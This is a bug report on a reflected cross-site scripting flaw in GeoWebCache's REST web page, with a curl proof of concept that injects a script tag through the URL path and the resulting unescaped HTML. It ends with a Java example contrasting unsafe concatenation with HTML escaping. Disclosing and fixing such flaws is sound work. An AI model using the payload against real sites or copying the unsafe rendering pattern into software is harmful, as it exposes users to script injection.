Another XSS vulnerability in GWC

Description

Running

curl 'http://localhost:8080/geoserver/gwc/rest/web/"><script>alert(1)</script>'

yields an answer with unescaped HTML:

<html><body>
<a id="logo" href="http://localhost:8080/geoserver/gwc/rest/web/"><script>alert(1)</"><img src="http://localhost:8080/geoserver/gwc/rest/web/"><script>alert(1)</script>/web/geowebcache_logo.png" alt="" height="100" width="353" border="0"/></a>
<h3>Resources available from here:</h3><ul><li><h4><a href="http://localhost:8080/geoserver/gwc/rest/web/"><script>alert(1)</script>/layers/">layers</a></h4>Lets you see the configured layers. You can also view a specific layer by appending the name of the layer to the URL, DELETE an existing layer or POST a new one. Note that the latter operations only make sense when GeoWebCache has been configured through geowebcache.xml. You can POST either XML or JSON.</li>
<li><h4>seed</h4></li>
</ul></body></html>

Looks like the problem is similar to GEOS-7549.

Environment

Tomcat 7, OpenJDK 1.8.0_102

Status

Assignee

Unassigned

Reporter

Juraj Hrubsa

Triage

None

Fix versions

Affects versions

2.8.5

Components

Priority

Medium
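
The fix pattern for the reflection reported above, as an added example that is not part of the original report and is not GeoWebCache source: a small Java renderer that builds the "layers" link from the request URL, once by raw concatenation and once with HTML escaping for the attribute context. The class and method names are hypothetical, and the input is the path from the report's curl command.

```java
// Added example with hypothetical names; not GeoWebCache code.
public class IndexPageEscaping {

    // Escape the characters that can end a quoted attribute or open a tag.
    static String escapeHtml(String s) {
        StringBuilder out = new StringBuilder(s.length() + 16);
        for (int i = 0; i < s.length(); i++) {
            char c = s.charAt(i);
            switch (c) {
                case '&':  out.append("&amp;");  break;
                case '<':  out.append("&lt;");   break;
                case '>':  out.append("&gt;");   break;
                case '"':  out.append("&quot;"); break;
                case '\'': out.append("&#39;");  break;
                default:   out.append(c);
            }
        }
        return out.toString();
    }

    // Before: the request-derived URL goes into href unchanged, as in the response above.
    static String renderUnsafe(String baseUrl) {
        return "<a href=\"" + baseUrl + "/layers/\">layers</a>";
    }

    // After: same markup, URL escaped at the point of output.
    static String renderSafe(String baseUrl) {
        return "<a href=\"" + escapeHtml(baseUrl) + "/layers/\">layers</a>";
    }

    public static void main(String[] args) {
        // Constructed input: base URL as the server would reflect it for the reported request.
        String baseUrl = "http://localhost:8080/geoserver/gwc/rest/web/\"><script>alert(1)</script>";
        String unsafe = renderUnsafe(baseUrl);
        String safe = renderSafe(baseUrl);
        System.out.println("unsafe: " + unsafe);
        System.out.println("safe:   " + safe);

        // Regression check: the raw output carries the tag, the escaped output does not,
        // and the escaped output still has exactly the two quotes delimiting href.
        long quotes = safe.chars().filter(ch -> ch == '"').count();
        if (!unsafe.contains("<script>") || safe.contains("<script>") || quotes != 2) {
            throw new AssertionError("escaping regression");
        }
    }
}
```

The same escaping has to be applied at every place the response embeds the URL (the logo `href`, the `img src` and the layers link in the output above), since each one reflects the input independently.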